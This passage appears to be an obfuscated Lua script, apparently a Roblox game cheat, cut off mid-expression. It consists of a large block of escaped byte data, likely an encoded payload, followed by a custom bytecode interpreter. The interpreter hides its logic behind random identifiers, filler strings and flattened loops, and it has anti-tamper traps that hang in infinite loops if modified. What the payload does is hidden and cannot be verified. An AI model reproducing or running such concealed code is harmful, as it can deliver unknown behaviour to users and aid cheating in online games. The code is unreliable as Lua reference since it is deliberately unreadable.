17a\0\34\0\28\2\0\0\51\2\0\137\72\97\153\0\1\4b\0\35\0\213\0\0\0\193\136\33\0\0\1\10a\0\36\0\20\0\0\0\0\0\0\0\9\0\10\0\1\4b\0\37\0\23\1\0\0\65\137\13\0\0\1\16a\0\35\0\35\0\0\0\37\0\0\213\72\137\17\0\1\17a\0\34\0\225\1\0\0\35\0\0\137\200\8\154\0\1\17a\0\34\0\228\1\0\0\49\1\0\137\8\206\155\0\1\15a\0\35\0\0\0\0\0\3\0\0\202\200\0\0\0\1\17a\0\35\0\28\2\0\0\17\1\0\201\200\97\153\0\1\4b\0\36\0\107\0\0\0\1\9\34\0\0\1\10a\0\37\0\23\0\0\0\0\0\0\64\9\128\11\0\1\4b\0\38\0\251\0\0\0\129\73\34\0\0\1\10a\0\39\0\24\0\0\0\0\0\0\192\9\0\12\0\1\4b\0\40\0\23\1\0\0\1\138\13\0\0\1\16a\0\36\0\36\0\0\0\40\0\0\21\9\10\18\0\1\17a\0\35\0\225\1\0\0\36\0\0\201\8\9\154\0\1\17a\0\35\0\228\1\0\0\84\1\0\201\72\197\155\0\1\15a\0\36\0\0\0\0\0\3\0\0\10\201\0\0\0\1\17a\0\36\0\28\2\0\0\12\2\0\9\137\98\153\0\1\4b\0\37\0\221\0\0\0\65\201\34\0\0\1\10a\0\38\0\21\0\0\0\0\0\0\128\9\128\10\0\1\4b\0\39\0\251\0\0\0\193\73\34\0\0\1\10a\0\40\0\22\0\0\0\0\0\0\0\10\0\11\0\1\4b\0\41\0\23\1\0\0\65\138\13\0\0\1\16a\0\37\0\37\0\0\0\41\0\0\85\73\138\18\0\1\17a\0\36\0\225\1\0\0\37\0\0\9\73\9\154\0\1\17a\0\36\0\228\1\0\0\84\1\0\9\73\197\155\0\1\15a\0\37\0\0\0\0\0\3\0\0\74\201\0\0\0\1\17a\0\37\0\28\2\0\0\115\1\0\73\9\99\153\0\1\4b\0\38\0\112\0\0\0\129\73\35\0\0\1\10a\0\39\0\25\0\0\0\0\0\0\192\9\128\12\0\1\4b\0\40\0\23\1\0\0\1\138\13\0\0\1\16a\0\38\0\38\0\0\0\40\0\0\149\9\10\19\0\1\17a\0\37\0\225\1\0\0\38\0\0\73\137\9\154\0\1\17a\0\37\0\228\1\0\0\84\1\0\73\73\197\155\0\1\18a\0\28\0\9\0\0\0\1\0\0\34\71\128\4\0\1\17a\0\27\0\29\1\0\0\28\0\0\201\6\135\152\0\1\15a\0\28\0\0\0\0\0\1\0\0\10\71\0\0\0\1\4b\0\29\0\31\1\0\0\65\135\25\0\0\1\7a\0\30\0\3\0\0\0\52\1\0\134\199\204\1\0\1\4b\0\31\0\191\0\0\0\193\199\25\0\0\1\7a\0\32\0\11\0\0\0\52\1\0\6\200\204\5\0\1\16a\0\29\0\29\0\0\0\32\0\0\85\7\136\14\0\1\17a\0\28\0\10\2\0\0\29\0\0\9\71\135\178\0\1\17a\0\27\0\202\1\0\0\28\0\0\201\6\7\178\0\1\5b\0\28\0\209\0\0\0\5\199\0\0\0\1\7a\0\28\0\28\0\0\0\47\1\0\6\71\65\14\0\1\4b\0\29\0\136\0\0\0\65\71\26\0\0\1\6a\0\28\0\2\0\0\0\2\0\0\28\135\0\1\0\1\17a\0\27\0\220\1\0\0\28\0\0\201\6\7\180\0\1\10a\0\26\0\27\0\0\0\0\0\0\128\6\128\13\0\1\13a\0\26\0\0\0\0\1x\154\6\0\0\0\1\9x\0\0\0\27\0\2\0\22\192\6\128\0\1\10a\0\27\0\6\0\0\0\0\0\0\192\6\0\3\0\1\15a\0\28\0\0\0\0\0\4\0\0\10\7\1\0\0\1\5b\0\29\0\180\0\0\0\69\71\0\0\0\1\6a\0\29\0\1\0\0\0\2\0\0\92\135\128\0\0\1\7a\0\29\0\29\0\0\0\253\1\0\70\7\203\14\0\1\7a\0\29\0\29\0\0\0\246\1\0\70\135\227\14\0\1\17a\0\28\0\36\2\0\0\29\0\0\9\71\135\144\0\1\17a\0\28\0\6\2\0\0\53\1\0\9\7\228\199\0\1\15a\0\29\0\0\0\0\0\1\0\0\74\71\0\0\0\1\17a\0\29\0\37\2\0\0\37\1\0\73\199\100\201\0\1\17a\0\28\0\39\1\0\0\29\0\0\9\71\135\200\0\1\5b\0\29\0\111\0\0\0\69\199\1\0\0\1\11a\0\29\0\29\0\0\0\165\1\0\75\7\194\14\0\1\4b\0\31\0\34\1\0\0\193\135\3\0\0\1\6a\0\29\0\3\0\0\0\2\0\0\92\135\128\1\0\1\11a\0\29\0\29\0\0\0\236\1\0\75\7\229\14\0\1\15a\0\31\0\0\0\0\0\2\0\0\202\135\0\0\0\1\5b\0\32\0\123\0\0\0\5\136\37\0\0\1\17a\0\31\0\108\1\0\0\32\0\0\201\7\136\202\0\1\15a\0\32\0\2\0\0\0\0\0\0\10\8\0\1\0\1\10a\0\33\0\14\0\0\0\0\0\0\64\8\0\7\0\1\10a\0\34\0\26\0\0\0\0\0\0\128\8\0\13\0\1\18a\0\32\0\2\0\0\0\1\0\0\34\72\0\1\0\1\17a\0\31\0\211\1\0\0\32\0\0\201\7\136\203\0\1\6a\0\29\0\3\0\0\0\2\0\0\92\135\128\1\0\1\17a\0\28\0\197\1\0\0\29\0\0\9\71\7\146\0\1\6a\0\27\0\2\0\0\0\1\0\0\220\70\0\1\0\1\9x\0\0\0\27\0\2\0\22\192\6\128\0\1\10a\0\27\0\6\0\0\0\0\0\0\192\6\0\3\0\1\15a\0\28\0\0\0\0\0\4\0\0\10\7\1\0\0\1\5b\0\29\0\180\0\0\0\69\71\0\0\0\1\6a\0\29\0\1\0\0\0\2\0\0\92\135\128\0\0\1\7a\0\29\0\29\0\0\0\253\1\0\70\7\203\14\0\1\7a\0\29\0\29\0\0\0\246\1\0\70\135\227\14\0\1\17a\0\28\0\36\2\0\0\29\0\0\9\71\135\144\0\1\17a\0\28\0\6\2\0\0\53\1\0\9\7\228\199\0\1\15a\0\29\0\0\0\0\0\1\0\0\74\71\0\0\0\1\17a\0\29\0\37\2\0\0\37\1\0\73\199\100\201\0\1\17a\0\28\0\39\1\0\0\29\0\0\9\71\135\200\0\1\5b\0\29\0\111\0\0\0\69\199\1\0\0\1\11a\0\29\0\29\0\0\0\165\1\0\75\7\194\14\0\1\4b\0\31\0\34\1\0\0\193\135\3\0\0\1\6a\0\29\0\3\0\0\0\2\0\0\92\135\128\1\0\1\11a\0\29\0\29\0\0\0\236\1\0\75\7\229\14\0\1\15a\0\31\0\0\0\0\0\2\0\0\202\135\0\0\0\1\5b\0\32\0\123\0\0\0\5\136\37\0\0\1\17a\0\31\0\108\1\0\0\32\0\0\201\7\136\202\0\1\15a\0\32\0\1\0\0\0\0\0\0\10\8\128\0\0\1\10a\0\33\0\14\0\0\0\0\0\0\64\8\0\7\0\1\18a\0\32\0\1\0\0\0\1\0\0\34\72\128\0\0\1\17a\0\31\0\211\1\0\0\32\0\0\201\7\136\203\0\1\6a\0\29\0\3\0\0\0\2\0\0\92\135\128\1\0\1\17a\0\28\0\197\1\0\0\29\0\0\9\71\7\146\0\1\6a\0\27\0\2\0\0\0\1\0\0\220\70\0\1\0\1\9x\0\0\0\0\0\2\0\22\0\0\128\0\1\9x\0\0\0\254\255\1\0\22\128\255\127\0\0\10x_x0o4124oa\0\0\0\1\0\0\0\0\0\0\30\0\128\0\0\20\0\0\0\2"if(b[p]==nil)then return(function()while h~=a do c=o(c,1,#c-(#('"cilberion on top"') - 17))..(b._Y8SSqBagLLZB)end end)()end;local function c()if s(q(w(j),nil,(b._IZjlLbKGnLSbNeO)),(b._RTktDZ))then return I()end end;local function h(h,j,p,w,I)local O;local P;local Q;local R;local S=(b._eoU5OynZY_l39)local S=(b._WR3P70P)for a in c do break end;local S;local T;local U;local V;local W=(b._Zua_SfhoEl)local W;local X;local Y=false;local Z;if((h~=0 and j~=(b._uPQvqm1d6h))and h~=(b._ENVDJKGD_6jsh))then while(h~=0)do j=(b._MwTtwKdzmo3hb)end elseif(h==0 and j==(b._uPQvqm1d6h))then Y=true end;local ab={}for a=(#('"please join the discord"') - 24),r(64,4,(b._m34zaSiV))do ab[a]=d(r(a,1,(b._RILN1YsibM87wlw)))end;local ab;local bb=(function(a,...)return a and x end)((b._VRtJp6))local d=t((b._kLx6arq),d(),(b._osDskE))local cb=6539;local db=748;while(cb>(db-(#('"joindiscordplzs"') - 5)))do db=(cb+408)*(#('"haha"') - 4)P=Y and(p)or({})end;local cb=6432;local db=5427;while(cb>(db-10))do db=(cb+3863)*(#('"joindiscordplzs"') - 15)while(cb<db)do db=cb-41180;while(cb>(db-12))do db=(cb+3790)*2;while(cb<db)do db=cb-40888;while(cb>(db-11))do db=(cb+397)*2;while(cb<db)do db=cb-27316;while(cb>(db-12))do db=(cb+1427)*(#('"please join the discord"') - 23)while(cb<db)do db=cb-31436;while(cb>(db-10))do db=(cb+2321)*((function(A) return (#A - 26) end)('"i need huge pets on petsim"'))T=(0)end;if(12864-cb)<(db+6464)then cb=((db+6432)*2)S=Y and I end end;if cb>(db-95752)then db=(cb+12864)Z={}end end;if(95752-cb)<(db+47881)then cb=((db+6432)*(#('"progamer"') - 8))R=Y and({})or(j)end end;if cb>(db-268688)then db=(cb+12864)P[(b._N0dkk_GdO)]=Y and(P[(b._N0dkk_GdO)])or(p)end end;if(268688-cb)<(db+134386)then cb=((db+6432)*2)O=false end end;if cb>(db-614560)then db=(cb+12864)W=Y and(P[(b._9pAY)][-((function(A) return (#A - 5) end)('"haha"'))])or(0)end end;if(614560-cb)<(db+307297)then cb=((db+6432)*2)Q=(Y==true and w)or(Y==false and I or a())or{}end end;if cb>(db-1306304)then db=(cb+12864)V=Y and(P[(b._LcTcKVoZ_drh0)][-1])or(1)end end;local j=5382;local p=5336;while(j>(p-((function(A) return (#A - 8) end)('"cilberion on top 2"'))))do p=(j+738)*2;while(j<p)do p=j-24480;ab=function(a,c)local d=d;local f=s(-1,(b._oaYuY32HGHs3_7e))for h=(#('"joindiscordplzs"') - 16),g(a)do local a=u(e(o(a,h,h)),e(o(c,f,f)))d=t(d,o(m,a,a)or a,(b._osDskE))f=q(g(c),f+1,(b._zGKG0Oeh6KDj))and((function(A) return (#A - 30) end)('"dscdotggslashcilberionscripts"'))or r(f,((function(A) return (#A - 9) end)('"progamer"')),(b._Qy7JQ9c))end;return d end end;if j>(p-10764)then p=(j+10764)B=function(a,...)return ab(a,bb,...)end end end;local d={[(b._u6EK)]=function(a,c)if(Y~=true and O)then local a=1117;local d=2142;while(a<d)do d=a-4284;while(a>(d-((function(A) return (#A - 11) end)('"bloxfruits vs roblox"'))))do d=(a+767)*((function(A) return (#A - 3) end)('"123"'))while(((function(A) return (#A - 27) end)('"i need huge pets on petsim"'))==1 and O==(#P>-1))do P[c]=(b._JcYAOJN0q)end end;if(2234-a)<(d+1150)then a=((d+1117)*2)return end end elseif(P==nil)then P={}end;local d=4605;local e=349;while(d>(e-(#('"123"') - -7)))do e=(d+3094)*(#('"dscdotggslashcilberionscripts"') - 29)while(d<e)do e=d-30796;while(d>(e-((function(A) return (#A - 17) end)('"i know your looking at me"'))))do e=(d+4720)*2;while(d<e)do e=d-37300;if(c==(b._tLjQH))then U=c end end;if d>(e-9210)then e=(d+9210)if(c==(b._b7z9ZIkquD))then U=c end end end;if(9210-d)<(e+4618)then d=((e+4605)*(#('"i need huge pets on petsim"') - 26))if(c==(b._yLj4GoVKE22Ua5))then U=c end end end;if d>(e-73680)then e=(d+9210)if(c==(b._j2pMRTjbjBiX))then U=c end end end;if(c~=(b._b7z9ZIkquD)and c~=(b._yLj4GoVKE22Ua5)and c~=(b._tLjQH)and c~=(b._j2pMRTjbjBiX))then local a=4246;local c=5647;while(a<c)do c=a-11294;return n((b._i7ECUEShK))end end;return a end;[(b._FCCb1fvU1r)]=function(a,d,e,f,g,h)if(Y~=true and O)then return n((b._uam7J6_4r))end;if(U==(b._b7z9ZIkquD))then if(X)then local a=6867;local c=6595;while(a>(c-12))do c=(a+919)*2;while(a<c)do c=a-31144;while(a>(c-12))do c=(a+2673)*2;local a={[(b._isbbS8)]=X}local c=44;local e=4969;while(c<e)do e=c-9938;while(c>(e-((function(A) return (#A - 6) end)('"cilberion on top"'))))do e=(c+2608)*2;while(c<e)do e=c-10608;while(c>(e-10))do e=(c+90)*2;while(c<e)do e=c-536;P[(b._LcTcKVoZ_drh0)][V]=a end;if c>(e-88)then e=(c+88)a[1]=d[1]end end;if(88-c)<(e+64)then c=((e+44)*2)a[(b._BpclQhVTjKGht87)]=false end end;if c>(e-704)then e=(c+88)a[((function(A) return (#A - 20) end)('"bloxfruits vs roblox"'))]=d[(#('"cilberion on top 2"') - 18)]end end;if(704-c)<(e+371)then c=((e+44)*2)a[3]=d[3]end end end;if(13734-a)<(c+6894)then a=((c+6867)*2)V=V+(#('"cilberion on top 2"') - 19)end end;if a>(c-103788)then c=(a+13734)X=nil end end else local a=1165;local b=1438;while(a<b)do b=a-2876;X=d end end elseif(U==(b._yLj4GoVKE22Ua5))then local a;local c=3342;local e=3242;while(c>(e-10))do e=(c+155)*((function(A) return (#A - 20) end)('"bloxfruits vs roblox"'))a=P[(b._9pAY)][W-1]end;if(d==nil and l(a)==(b._Bd5OIFCsl73v2))then local c=2635;local d=4784;while(c<d)do d=c-9568;P[(b._9pAY)][W-(#('"cilberion on top"') - 17)]={A(a)}end elseif(l(d)==(b._Ci5Je1Z)and d[(b._we7kv9BTBlAH)]==true)then local a=3239;local c=1986;while(a>(c-(#('"i know your looking at me"') - 16)))do c=(a+1491)*2;while(a<c)do c=a-18920;P[(b._9pAY)][W]=d end;if a>(c-6478)then c=(a+6478)W=W+1 end end elseif(l(d)==(b._Ci5Je1Z))then local a=3116;local c=4259;while(a<c)do c=a-8518;while(a>(c-(#('"dscdotggslashcilberionscripts"') - 19)))do c=(a+3004)*(#('"cant think of any words anymore"') - 31)P[(b._9pAY)][W]=d[1]or nil end;if(6232-a)<(c+3139)then a=((c+3116)*2)W=W+1 end end else local a=657;local c=1642;while(a<c)do c=a-3284;while(a>(c-((function(A) return (#A - 15) end)('"i know your looking at me"'))))do c=(a+3415)*((function(A) return (#A - 23) end)('"please join the discord"'))P[(b._9pAY)][W]=d end;if(1314-a)<(c+663)then a=((c+657)*2)W=W+1 end end end elseif(U==(b._j2pMRTjbjBiX))then local a;a=function(d)local e={}local f=0;for a=1,#d[(b._j2Jzwfz)]do local a=d[(b._j2Jzwfz)][a]if(l(a)==(b._Ci5Je1Z))then c()e[f]={A(a[((function(A) return (#A - 4) end)('"123"'))])}f=f+1 else e[f]=a;f=f+1 end end;e[-1]=f;d[(b._9pAY)]=e;local c={}local e=((function(A) return (#A - 32) end)('"cant think of any words anymore"'))for a=((function(A) return (#A - 9) end)('"progamer"')),#d[(b._lTZhR6emV8_4wr)]do local a=d[(b._lTZhR6emV8_4wr)][a]c[e]=a;e=e+1 end;c[-((function(A) return (#A - 17) end)('"cilberion on top"'))]=e;d[(b._LcTcKVoZ_drh0)]=c;local c={}local e=0;for f=(#('"cant think of any words anymore"') - 32),#d[(b._BEBd6Ezhv)]do c[e]=a(d[(b._BEBd6Ezhv)][f])e=e+(#('"joindiscordplzs"') - 16)end;d[(b._BEBd6Ezhv)]=c;d[(b._BEBd6Ezhv)][-1]=e;return d end;local a=a(d)P[(b._BEBd6Ezhv)][T]=a;T=T+1 elseif(U==(b._tLjQH))then while(d>-1)do P[e]=P[e]or{}P[f]=P[f]or{}P[g]=P[g]or{}P[(b._ZZQgMU)]=P[(b._ZZQgMU)]or h;d=(d*-((function(A) return (#A - 24) end)('"please join the discord"')))-(50)end end;return a end}local function e(d,...)if(Y~=true and O)then return n((b._MTXxPxWnOSuw))else O=true end;local d,e=((function(A) return (#A - 9) end)('"progamer"')),-1;local g={}local g=J({},{[(b._u6EK)]=g,[(b._vZZlJwO4Kl)]=function(a,a,b)if(a>e)then e=a end;g[a]=b end})local a,j={},a()[(b._nmVy1qR)]((b._KMFFbjNO),...)-1;local m={...}for c=0,j do if(c>=P[(b._ZZQgMU)])then a[c-P[(b._ZZQgMU)]]=m[c+(#('"haha"') - 5)]else g[c]=m[c+((function(A) return (#A - 9) end)('"progamer"'))]end end;local function a()local a=P[(b._9pAY)]while true do local j,m,m,m,n;j=P[(b._LcTcKVoZ_drh0)][d]m=j[(b._isbbS8)]d=d+1;local n=G;if(m==(b._nZd_b3icPW6D))then local a=g;j[3]=j[3]or false;if(j[2]>=256)then j[4]=j[2]-256;j[(#('"please join the discord"') - 21)]=P[(b._9pAY)][j[4]]end;j[(#('"dont please"') - 9)]=j[(#('"cilberion on top 2"') - 16)]or false;if(j[3]>=256)then j[5]=j[(#('"progamer"') - 7)]-256;j[(#('"joindiscordplzs"') - 12)]=P[(b._9pAY)][j[(#('"dont please"') - 8)]]end;local b=j[4]or a[j[((function(A) return (#A - 31) end)('"cant think of any words anymore"'))]]local a=j[5]or a[j[3]]if(b<=a)~=j[(#('"dont please"') - 12)]then d=d+1 end elseif(m~=(b._nZd_b3icPW6D))then if((b._aVtZ_k)~=m)then if((b._QxwGeB)~=m)then if(m~=(b._nf_Dve))then if(m~=(b._Qtxoa9X1k))then if(m~=(b._EhRzdMxeS_h))then if((b._ErcDg7GB3mF)==m)then g[j[((function(A) return (#A - 5) end)('"haha"'))]]=Q[D(P[(b._9pAY)][j[((function(A) return (#A - 29) end)('"dscdotggslashcilberionscripts"'))]])]N(g[j[1]](z(args,1,limit-j[((function(A) return (#A - 27) end)('"i need huge pets on petsim"'))],(F))))g[j[(#('"cilberion on top 2"') - 19)]]=D(P[(b._9pAY)][j[(#('"i know your looking at me"') - 25)]])F=o(P[g[j[1]]],g[j[2]],g[j[3]])elseif(m~=(b._ErcDg7GB3mF))then if(m~=(b._vmjN4))then if((b._xcPhDD8EA)==m)then N(g[j[(#('"i need huge pets on petsim"') - 27)]](z(args,(#('"haha"') - 5),limit-j[(#('"please join the discord"') - 24)],(F))))g[j[1]]={o((F),((function(A) return (#A - 19) end)('"cilberion on top 2"')),g[j[2]])}g[j[1]]=Q[P[(b._9pAY)][j[(#('"joindiscordplzs"') - 15)]]](F)P[(b._9pAY)][i]=K(v[(#('"dscdotggslashcilberionscripts"') - 30)],x)elseif(m~=(b._xcPhDD8EA))then if(m==(b._gJViDg6Vw))then for a,c in H(P[(b._9pAY)])do if(l(c)==(b._wY4Qb1iD)and l(c[1])==(b._JhALNauV2))then P[(b._9pAY)][a]=K(c[1],C)end end elseif(m~=(b._gJViDg6Vw))then if((b._mCIruA8Bpie)==m)then local a=g;local c=j[((function(A) return (#A - 23) end)('"please join the discord"'))]local d=a[c]for b=c+(#('"i need huge pets on petsim"') - 27),j[3]do d=d..a[b]end;g[j[((function(A) return (#A - 27) end)('"i need huge pets on petsim"'))]]=d;g[j[(#('"cant think of any words anymore"') - 31)]]=F;local a=P[(b._9pAY)][j[(#('"123"') - 4)]+j[(#('"i need huge pets on petsim"') - 25)]]g[j[1]]=a[j[2]]F=o(P[g[j[1]]],g[j[(#('"please join the discord"') - 23)]],g[j[(#('"progamer"') - 7)]])local a=g;local b=j[2]local c=a[b]for b=b+(#('"progamer"') - 9),j[3]do c=c..a[b]end;g[j[1]]=c;g[j[2]]=F else if((b._HEm9vlaOOAa5)~=m)then if((b._cp4v7guXO_pZT)==m)then local b=g;local c,e=j[4],j[5]if(c==nil)then if(j[((function(A) return (#A - 16) end)('"cilberion on top"'))]>=256)then c=j[((function(A) return (#A - 8) end)('"progamer"'))]-256;c=a[c]j[(#('"haha"') - 2)]=c end end;if(e==nil)then if(j[(#('"123"') - 2)]>=256)then e=j[((function(A) return (#A - 10) end)('"dont please"'))]-256;e=a[e]j[((function(A) return (#A - 23) end)('"i need huge pets on petsim"'))]=e end end;local a=c or b[j[2]]local b=e or b[j[(#('"123"') - 2)]]if(a==b)~=j[(#('"cant think of any words anymore"') - 32)]then d=d+(#('"i need huge pets on petsim"') - 27)end else if(m==(b._S9jg3CxWGaTFD))then g[j[1]]=Q[D(P[(b._9pAY)][j[((function(A) return (#A - 8) end)('"progamer"'))]])]N(g[j[(#('"cilberion on top"') - 17)]](z(args,1,limit-j[1],(F))))g[j[1]]=D(P[(b._9pAY)][j[((function(A) return (#A - 4) end)('"haha"'))]])F=o(P[g[j[1]]],g[j[(#('"123"') - 3)]],g[j[3]])else if((b._VBvZbtfTzJ)~=m)then if((b._k_6l6MZ5Ke)==m)then if(N(g[j[1]])==F)then P[(b._isbbS8)]=(function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH))end;do d=d+(#('"dont please"') - 12)end;P[(b._9pAY)][i]=K(v[((function(A) return (#A - 16) end)('"joindiscordplzs"'))],x)for a=g[j[2]],g[j[1]]do g[j[3]]=g[j[3]]..g[P[(b._9pAY)]][a]end;P[(b._9pAY)]=j[(#('"i know your looking at me"') - 25)]/{[j[(#('"cilberion on top"') - 17)]]=(b._ctNGdy),[j[((function(A) return (#A - 3) end)('"haha"'))]]=F}d=d-(#('"123"') - 4)*(P[(b._LcTcKVoZ_drh0)])P[(b._isbbS8)]((function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH)))j[5]=P[(b._9pAY)][j[(#('"dont please"') - 8)]]elseif(m~=(b._k_6l6MZ5Ke))then if(m==(b._yQyTNANys))then g[j[(#('"dont please"') - 12)]]=g[j[2]]elseif(m~=(b._yQyTNANys))then if(m~=(b._sAXg9BD9e))then if((b._Hmwh7Msb10WX)==m)then if(j[3]>=256)then j[5]=j[3]-256;j[((function(A) return (#A - 26) end)('"dscdotggslashcilberionscripts"'))]=P[(b._9pAY)][j[(#('"progamer"') - 5)]]end;local a=g;local b=j[((function(A) return (#A - 9) end)('"progamer"'))]local c=a[j[2]]local d=j[((function(A) return (#A - 5) end)('"progamer"'))]or a[j[(#('"cilberion on top"') - 15)]]a[b+(#('"haha"') - 5)]=c;a[b]=c[d]else if((b._XDnOz6B)==m)then local a,a=E(function()local a=(#('"joindiscordplzs"') - 16)-(b._pTN4WA)^(#('"dont please"') - 11)return(b._OxOCrMwCspJE)/a end)local a=f(G(a),(b._ZMCNAouGb))()local a=k(a)local c=L(E(function()local a=(b._eUXTdl)^((function(A) return (#A - 18) end)('"cilberion on top 2"'))return(b._sA0L_IGCjsp)%a end))if(c~=M or M==nil or(l~=nil and l(M)~=(b._TI5cS))or c~=a or a~=M)then d=r(d,1,(b._RILN1YsibM87wlw))return(function()while true do d=d-((function(A) return (#A - 24) end)('"please join the discord"'))if d<-100 then d=1000 end end;return(b._J2l_ah_OdCP)end)()elseif not(c~=M or M==nil or(l~=nil and l(M)~=(b._TI5cS))or c~=a or a~=M)then g[j[1]]=j[((function(A) return (#A - 11) end)('"dont please"'))]end else if((b._Mhil7xxw)~=m)then if((b._LvLg4Jg)~=m)then if(m==(b._vUKTTT))then g[j[1]]={}else if(m~=(b._fVm0Yw6z))then if((b._q2frachkHfoY)~=m)then if(m~=(b._jq3BcF))then if((b._ajdQAI)==m)then g[j[(#('"i need huge pets on petsim"') - 27)]]=Q[D(P[(b._9pAY)][j[(#('"bloxfruits vs roblox"') - 20)]])]N(g[j[1]](z(args,1,limit-j[(#('"haha"') - 5)],(F))))d=d-1*(P[(b._LcTcKVoZ_drh0)])P[(b._isbbS8)]((function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH)))elseif(m~=(b._ajdQAI))then if(m==(b._Btog6hxzUSzn))then Q[P[(b._9pAY)][j[(#('"haha"') - 4)]]]=g[j[((function(A) return (#A - 26) end)('"i know your looking at me"'))]]g[j[1]]=K(P[(b._9pAY)][j[2]],x)Q[D(P[(b._9pAY)][j[(#('"cilberion on top"') - 16)]])]=g[j[((function(A) return (#A - 4) end)('"123"'))]]elseif(m~=(b._Btog6hxzUSzn))then if((b._ctEzD_l)==m)then local a=g;for b=j[(#('"cant think of any words anymore"') - 32)],j[((function(A) return (#A - 4) end)('"haha"'))]do a[b]=nil end elseif(m~=(b._ctEzD_l))then if(m==(b._CHKZ_CR))then if j[(#('"i know your looking at me"') - 24)]then if g[j[1]]then d=d+(#('"123"') - 4)end elseif g[j[(#('"joindiscordplzs"') - 16)]]then else d=d+1 end else if(m==(b._GrHizIhmjfA))then g[j[1]]=(j[((function(A) return (#A - 26) end)('"i need huge pets on petsim"'))]~=0)if(j[3]~=0)then d=d+((function(A) return (#A - 5) end)('"haha"'))end else if(m==(b._D_JZkrf))then local a=g;local b=j[2]local c=a[b]for b=b+1,j[3]do c=c..a[b]end;g[j[(#('"dscdotggslashcilberionscripts"') - 30)]]=c elseif(m~=(b._D_JZkrf))then if((b._TknmDvSz8)==m)then g=j[2]%g[j[2]]*j[1]P[(b._9pAY)][i]=K(v[(#('"dont please"') - 12)],x)P[(b._9pAY)][i]=K(v[1],x)g[j[((function(A) return (#A - 19) end)('"cilberion on top 2"'))]]=K(P[(b._9pAY)][j[2]],x)d=d-1;g[j[1]]={o((F),1,g[j[((function(A) return (#A - 8) end)('"progamer"'))]])}Q[D(P[(b._9pAY)][j[2]])]=g[j[((function(A) return (#A - 32) end)('"cant think of any words anymore"'))]]else if(m==(b._Ld7M6ClyNu))then local a=j[(#('"cilberion on top 2"') - 19)]local b=j[2]local c=j[3]local d=g;local f,g;local h,j;f={}if(b~=1)then if(b~=0)then h=a+b-(#('"i need huge pets on petsim"') - 27)else h=e end;j=0;for a=a+(#('"progamer"') - 9),h do j=j+(#('"bloxfruits vs roblox"') - 21)f[j]=d[a]end;h,g=N(d[a](z(f,1,h-a)))else h,g=N(d[a]())end;e=a-1;if(c~=((function(A) return (#A - 19) end)('"cilberion on top 2"')))then if(c~=0)then h=a+c-2 else h=h+a-(#('"i know your looking at me"') - 26)end;j=0;for a=a,h do j=j+1;d[a]=g[j]end end elseif(m~=(b._Ld7M6ClyNu))then if((b._TFUfr7k0B)==m)then d=d-1*(P[(b._LcTcKVoZ_drh0)])P[(b._isbbS8)]((function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH)))g[j[1]]=Q[D(P[(b._9pAY)][j[2]])]P[(b._9pAY)][i]=K(v[(#('"please join the discord"') - 24)],x)if(N(g[j[1]])==F)then P[(b._isbbS8)]=(function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH))end;do d=d+1 end elseif(m~=(b._TFUfr7k0B))then if((b._XZKgBsTy1rEl)~=m)then if((b._hXdPJtgWj97)==m)then d=d+j[2]elseif(m~=(b._hXdPJtgWj97))then if((b._ucTXY24ZZLX6)~=m)then elseif(m==(b._ucTXY24ZZLX6))then N(g[j[1]](z(args,1,limit-j[(#('"i need huge pets on petsim"') - 27)],(F))))local a=P[(b._9pAY)][j[((function(A) return (#A - 32) end)('"cant think of any words anymore"'))]+j[((function(A) return (#A - 17) end)('"cilberion on top 2"'))]]g[j[1]]=a[j[(#('"123"') - 3)]]P[(b._9pAY)][i]=K(v[(#('"dont please"') - 12)],x)for a=g[j[((function(A) return (#A - 4) end)('"haha"'))]],g[j[1]]do g[j[(#('"dont please"') - 10)]]=g[j[(#('"123"') - 2)]]..g[P[(b._9pAY)]][a]end end end else local a=j[1]local b=j[(#('"haha"') - 4)]local c=g;local d,f;local g;if(b==((function(A) return (#A - 21) end)('"bloxfruits vs roblox"')))then return elseif(b==0)then g=e else g=a+b-(#('"cilberion on top"') - 16)end;f={}d=0;for a=a,g do d=d+1;f[d]=c[a]end;do return f,d end end end end end end end end end end end else g[j[1]]=P[(b._9pAY)][j[(#('"please join the discord"') - 23)]]end else Q[P[(b._9pAY)][j[((function(A) return (#A - 20) end)('"bloxfruits vs roblox"'))]]]=g[j[(#('"cilberion on top"') - 17)]]N(g[j[1]](z(args,((function(A) return (#A - 24) end)('"please join the discord"')),limit-j[1],(F))))Q[P[(b._9pAY)][j[(#('"i need huge pets on petsim"') - 26)]]]=g[j[1]]g[j[((function(A) return (#A - 19) end)('"cilberion on top 2"'))]]=D(P[(b._9pAY)][j[((function(A) return (#A - 29) end)('"dscdotggslashcilberionscripts"'))]])end elseif((b._fVm0Yw6z)==m)then c()if g[j[((function(A) return (#A - 5) end)('"haha"'))]]~=j[(#('"bloxfruits vs roblox"') - 20)]or h~=(b._ENVDJKGD_6jsh)or y~=A("\44\28\58\68\17\32\74\51\46\41\40\45\29\48\5\24\52\6\34\46\53\62\59")then d=d-1;return(function()while true do h=g[1]y=g[((function(A) return (#A - 26) end)('"i need huge pets on petsim"'))]end end)()elseif not(g[j[1]]~=j[2]or h~=(b._ENVDJKGD_6jsh)or y~=A("\44\28\58\68\17\32\74\51\46\41\40\45\29\48\5\24\52\6\34\46\53\62\59"))then g[j[((function(A) return (#A - 9) end)('"progamer"'))]]=nil;g[0]=nil;e=r(1,-1,(b._m34zaSiV))end end end else N(g[j[1]](z(args,(#('"please join the discord"') - 24),limit-j[((function(A) return (#A - 26) end)('"i know your looking at me"'))],(F))))g[j[1]]={o((F),1,g[j[(#('"cilberion on top 2"') - 18)]])}g[j[1]]=Q[P[(b._9pAY)][j[(#('"i know your looking at me"') - 25)]]](F)P[(b._9pAY)][i]=K(v[1],x)end elseif(m==(b._Mhil7xxw))then g[j[1]]=D(P[(b._9pAY)][j[(#('"dont please"') - 11)]])P[(b._9pAY)]=j[(#('"joindiscordplzs"') - 15)]/{[j[((function(A) return (#A - 32) end)('"cant think of any words anymore"'))]]=(b._ctNGdy),[j[(#('"dont please"') - 10)]]=F}N(g[j[1]](z(args,((function(A) return (#A - 5) end)('"haha"')),limit-j[1],(F))))F=o(P[g[j[1]]],g[j[2]],g[j[3]])end end end elseif((b._sAXg9BD9e)==m)then Q[P[(b._9pAY)][j[((function(A) return (#A - 3) end)('"123"'))]]]=g[j[1]]g[j[(#('"dont please"') - 